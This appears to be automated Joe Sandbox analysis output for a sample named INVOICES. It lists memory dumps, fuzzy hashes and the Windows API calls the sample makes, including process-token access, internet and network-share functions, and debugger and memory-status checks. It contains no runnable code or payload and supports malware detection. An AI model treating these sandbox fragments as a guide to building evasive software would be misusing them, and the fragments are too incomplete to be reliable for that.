• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: dd1abcdedd4906004ea9b7dcf5ebf4251159c5e6257613d2bc1667ddb13ad5a1
• Instruction ID: e1c5ed34a5b3d19549155889586e020ea3619bb3df9435011b37cf8ecaa6f7c0
• Opcode Fuzzy Hash: dd1abcdedd4906004ea9b7dcf5ebf4251159c5e6257613d2bc1667ddb13ad5a1
• Instruction Fuzzy Hash: 9AE06D32100248EAEF215F78FC0DBD83B10EB05732F00C366FA6A980E187794A90DF11
APIs
• GetCurrentThread.KERNEL32 ref: 00788A43
• OpenThreadToken.ADVAPI32(00000000,?,?,?,0078860E), ref: 00788A4A
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0078860E), ref: 00788A57
• OpenProcessToken.ADVAPI32(00000000,?,?,?,0078860E), ref: 00788A5E
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: de15035a647d4b61667a0096b7ece7cdaade3f6f926f7ca2655b4bf67292c4c7
• Instruction ID: 63ce3442f33ecc8c1c15dbc034872402df879d654b2ca8c6740b3a590792cfdb
• Opcode Fuzzy Hash: de15035a647d4b61667a0096b7ece7cdaade3f6f926f7ca2655b4bf67292c4c7
• Instruction Fuzzy Hash: 5CE08636641211EFD760AFB06E0CF973BACEF54B92F04C928F245CA090DA3C9441C755
APIs
• GetDesktopWindow.USER32 ref: 007720B6
• GetDC.USER32(00000000), ref: 007720C0
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 007720E0
• ReleaseDC.USER32(?), ref: 00772101
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: f525ad107219b4f011404a44546df0a8648acbf7de41da853ec8e40894e7791c
• Instruction ID: 7955ca16a63d4fb70820a0eeae7cf8e8b9a4fe33254951e4db41cd4cf59610e3
• Opcode Fuzzy Hash: f525ad107219b4f011404a44546df0a8648acbf7de41da853ec8e40894e7791c
• Instruction Fuzzy Hash: 4CE0C275800204EFDB01AF608C08BAD7BA1AB48750F10C125ED5AA6221CB7C8141DF45
APIs
• GetDesktopWindow.USER32 ref: 007720CA
• GetDC.USER32(00000000), ref: 007720D4
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 007720E0
• ReleaseDC.USER32(?), ref: 00772101
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cad71a377052ae6484c983bb1bcbe50944940d3d64b83da9144fa006c7097afa
                                                                                                                                  • Instruction ID: b18544e6028986976f51a4cd868f706b13bc9bd4182bbe637000020b53bf703f
                                                                                                                                  • Opcode Fuzzy Hash: cad71a377052ae6484c983bb1bcbe50944940d3d64b83da9144fa006c7097afa
                                                                                                                                  • Instruction Fuzzy Hash: 59E0EEB5800208AFDB01AFA0CC08BAD7BA1AB4C714F10C129FD5AA7221CB7C91419F44
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %|
                                                                                                                                  • API String ID: 0-1433500012
                                                                                                                                  • Opcode ID: b8ff6ac81491462bc1362891aff1d0ab6e172e303ab34bb3133dc30672ed449e
                                                                                                                                  • Instruction ID: 0a80e82262e460b91efc3a44be9916f87c31c39bec94bb32b9fdca06701cc502
                                                                                                                                  • Opcode Fuzzy Hash: b8ff6ac81491462bc1362891aff1d0ab6e172e303ab34bb3133dc30672ed449e
                                                                                                                                  • Instruction Fuzzy Hash: E1B1A275D00209EBEF24EF94C4959EDBBB4FF48310F508026E942A7197EB389E96CB51
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                  • __wcsnicmp.LIBCMT ref: 0079B0B9
                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0079B182
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                  • String ID: LPT
                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                  • Opcode ID: 63a3eeb79939855d16aeb66823cd156423391292827eebb1ff85861dff331fa4
                                                                                                                                  • Instruction ID: 718818f9b5de4476e419747151e5ea346ba7254d50d7c63ebaf7e74017bc75fe
                                                                                                                                  • Opcode Fuzzy Hash: 63a3eeb79939855d16aeb66823cd156423391292827eebb1ff85861dff331fa4
                                                                                                                                  • Instruction Fuzzy Hash: 9661A371A00219EFCF14DF98E995EAEB7B4FF08310F004059F546AB291DB78AE40CB90
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: Oat
                                                                                                                                  • API String ID: 4104443479-2936667180
                                                                                                                                  • Opcode ID: 698fa47c9feddf2b4c16b03dac44ac4c48d86bcf9370197afb74a77569866a2c
                                                                                                                                  • Instruction ID: 1be8649ed3bab613fae1c2dbfc38615ecd267047a0a32d646fe872d17e1619b3
                                                                                                                                  • Opcode Fuzzy Hash: 698fa47c9feddf2b4c16b03dac44ac4c48d86bcf9370197afb74a77569866a2c
                                                                                                                                  • Instruction Fuzzy Hash: FC514CB0E00609DFCF64CF68C884AAEB7B1FF44344F14856AE85AD7250EB39A955CB52
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00742AC8
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00742AE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                  • Opcode ID: b309419b50ef54502f80ee56cdf72df444b90277e6597bf5803c7c7f3321a635
                                                                                                                                  • Instruction ID: e6aa6fd82599c37c49e76e1615d1ea8698e06a084cb97a209b0154b8cefd8af8
                                                                                                                                  • Opcode Fuzzy Hash: b309419b50ef54502f80ee56cdf72df444b90277e6597bf5803c7c7f3321a635
                                                                                                                                  • Instruction Fuzzy Hash: E8515971418748DBE320AF10DC89BAFB7F8FB84310F41895DF2D9510A2DB749529CB66
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0073506B: __fread_nolock.LIBCMT ref: 00735089
                                                                                                                                  • _wcscmp.LIBCMT ref: 007998CD
                                                                                                                                  • _wcscmp.LIBCMT ref: 007998E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                  • String ID: FILE
                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                  • Opcode ID: 819d331c1e828add5bd79db357fe79e543ecde84c137ac06fbbcc02760ee1a17
                                                                                                                                  • Instruction ID: 4bb2e7f51cb45bd4fd0f64294c44c47fbb65d813f5c0e80f50af1781cdf4ca4c
                                                                                                                                  • Opcode Fuzzy Hash: 819d331c1e828add5bd79db357fe79e543ecde84c137ac06fbbcc02760ee1a17
                                                                                                                                  • Instruction Fuzzy Hash: 5C41D971A0061AFAEF219EA4DC8AFEF77BDDF45710F00046DFA04B7181DA79A90587A1
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 007A26B4
                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007A26EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                  • Opcode ID: 50252b81232c5d050d56f667e1a7b13d44ddefa0da5dfb3d624d8679815dbcad
                                                                                                                                  • Instruction ID: f9b31e653227eebe5930b60679d611ebe7c160b6e08a329d070adb49dd2d180d
                                                                                                                                  • Opcode Fuzzy Hash: 50252b81232c5d050d56f667e1a7b13d44ddefa0da5dfb3d624d8679815dbcad
                                                                                                                                  • Instruction Fuzzy Hash: AB313671800109EFDF55AFA4CC89EEEBFB9FF09314F100169F904A6166DA395A46DB60
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 007B6B49
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007B6B85
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 92528c0b5285f875f3a20bfa6fed4c840ecaaf210beb0463eae1722030a8f7fc
• Instruction ID: 8c18a7a96c018601808f653ec9495db3fb9c33b1edf1145edbf4d5a8461c52aa
• Opcode Fuzzy Hash: 92528c0b5285f875f3a20bfa6fed4c840ecaaf210beb0463eae1722030a8f7fc
• Instruction Fuzzy Hash: 70317C71110604AAEB109F78CC95BFB73B9FF48724F108619FAA9D7190DB79AC81DB60
APIs
• _memset.LIBCMT ref: 00792C09
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00792C44
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 84a42a0543c95e61b85176481f1553a8e8bd8de1b90bb444bf4b6fa237ec4e10
• Instruction ID: c1f7f44745a9428f0c678bee0fe24196a4b3572e8fedb32b781a176c68477fc1
• Opcode Fuzzy Hash: 84a42a0543c95e61b85176481f1553a8e8bd8de1b90bb444bf4b6fa237ec4e10
• Instruction Fuzzy Hash: 2931D931600209FFDF34AF54E985BAE7BB9EF06350F244019ED85961A2E7789A46CB60
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007B6793
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007B679E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 429ce7b84e8d4cf64c8ceacb0b6e56e118b2e7857ce274c5a1ec5b8dc59881aa
• Instruction ID: 1daa51f0280d97543260dfc0fb7052fa0ba4479f29520560ca0bb1608d7b7c3b
• Opcode Fuzzy Hash: 429ce7b84e8d4cf64c8ceacb0b6e56e118b2e7857ce274c5a1ec5b8dc59881aa
• Instruction Fuzzy Hash: 1E118275311208AFEF21DF24CC84FFB376AEB98368F114125FA1497290EA7D9C5187A0
APIs
  • Part of subcall function 00731D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00731D73
  • Part of subcall function 00731D35: GetStockObject.GDI32(00000011), ref: 00731D87
  • Part of subcall function 00731D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00731D91
• GetWindowRect.USER32(00000000,?), ref: 007B6CA3
• GetSysColor.USER32(00000012), ref: 007B6CBD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 0311e02d83400d07e043edb076f9469f9d1faaac943d1b80f815e986aa87bc2c
• Instruction ID: 3040920183258bd776cb3d1fd5263b7cfa20c7759c689e5acf7064e5e894c42b
• Opcode Fuzzy Hash: 0311e02d83400d07e043edb076f9469f9d1faaac943d1b80f815e986aa87bc2c
• Instruction Fuzzy Hash: 3F21F972610209AFDB05DFA8DC45EFA7BA8EB08314F054629FE55D2250E639E861DB60
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 007B69D4
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007B69E3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: e037a8138ba9ad572daf70eab81cda6813ce7cc2a1036354b451982829d1601b
• Instruction ID: af3ea143870025da66d672f670bb64bc6bcf1e01f1fb45ddb3ab1507dbc6813d
• Opcode Fuzzy Hash: e037a8138ba9ad572daf70eab81cda6813ce7cc2a1036354b451982829d1601b
• Instruction Fuzzy Hash: 63116A71500204ABEB108E64DC44BFB3769EB15768F608728FAA4971E0C73DEC909B60
APIs
• _memset.LIBCMT ref: 00792D1A
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00792D39
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 632f668c548e5cd3205ad99bf4b640fc45fda6b80a8dfa25510964d35e4014d5
• Instruction ID: 86135fc68d4ffd5d67acd3e106ffe012c85732adfee24dcc15a1d7f2490adfde
• Opcode Fuzzy Hash: 632f668c548e5cd3205ad99bf4b640fc45fda6b80a8dfa25510964d35e4014d5
• Instruction Fuzzy Hash: 4E11E231E01114BBCF20FB58EC84BAD77A9AB06300F144161ED15AB2A2D738EE07C7A5
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007A2342
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007A236B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: ffd6e4d156bf1745d2cc18a76a3d97da5c50d20ffa57a9e7733f59dce284787f
• Instruction ID: b4fcabcd7b2b531613c380c2c27688e6958e253713a1c7960cb85e13c84411e1
• Opcode Fuzzy Hash: ffd6e4d156bf1745d2cc18a76a3d97da5c50d20ffa57a9e7733f59dce284787f
• Instruction Fuzzy Hash: 7C11E070101225BADF248F168C88EBBFB68EF47751F10836AF94552001D27C6882CAF0
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00789135
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
Strings
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
• SendMessageW.USER32(?,00000180,00000000,?), ref: 0078902D
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
• SendMessageW.USER32(?,00000182,?,00000000), ref: 007890B0
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
• VariantInit.OLEAUT32(?), ref: 0078C7F6
  • Part of subcall function 0078CB06: _memmove.LIBCMT ref: 0078CB50
  • Part of subcall function 0078CB06: VariantInit.OLEAUT32(00000000), ref: 0078CB72
  • Part of subcall function 0078CB06: VariantCopy.OLEAUT32(00000000,?), ref: 0078CB7C
• VariantClear.OLEAUT32(?), ref: 0078C818
Strings
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}~
• API String ID: 2932060187-2645811566
APIs
Strings
Similarity
• API ID: __calloc_crt
• String ID: ~
• API String ID: 3494438863-2703998100
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
APIs
  • Part of subcall function 0076B494: _memset.LIBCMT ref: 0076B4A1
  • Part of subcall function 00750AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(007F4158,00000000,007F4144,0076B470,?,?,?,0073100A), ref: 00750AC5
• IsDebuggerPresent.KERNEL32(?,?,?,0073100A), ref: 0076B474
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0073100A), ref: 0076B483
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0076B47E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
